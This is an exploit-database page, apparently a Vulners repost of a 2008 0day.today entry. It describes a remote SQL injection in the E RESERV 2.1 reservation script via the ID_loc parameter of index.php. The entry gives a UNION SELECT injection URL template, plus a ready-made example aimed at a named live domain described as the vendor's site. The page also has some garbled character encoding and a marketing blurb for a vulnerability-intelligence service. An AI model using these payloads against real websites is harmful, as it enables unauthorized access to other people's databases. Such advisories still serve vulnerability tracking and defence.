Lucene search

K

E RESERV 2.1 (index.php ID_loc) SQL Injection Vulnerability

๐Ÿ—“๏ธย 23 Apr 2008ย 00:00:00Reported byย JiKoTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 14ย Views

E RESERV 2.1 has a SQL Injection vulnerability through index.php with ID_loc parameter exploitable remotely.

Show more
Code
===========================================================
E RESERV 2.1 (index.php ID_loc) SQL Injection Vulnerability
===========================================================



=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# Script  : E RESERV VERSION 2.1
# Bug   : Remote SQL Injection Vulnerability
=========================JIkI Team===================
# Exploit  :
 http://[Site]/[script]/index.php?ID_loc=[sql]
# Ex :
http://[Site]/[script]/index.php?ID_loc=-1 union select version()--
At Office Site
http://cogites.com/e_reserv/e_reserv/index.php?ID_loc=-1%20union%20select%20version()--
=========================================================



#  0day.today [2018-01-03]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Apr 2008 00:00Current
7.1High risk
Vulners AI Score7.1
14
.json
Report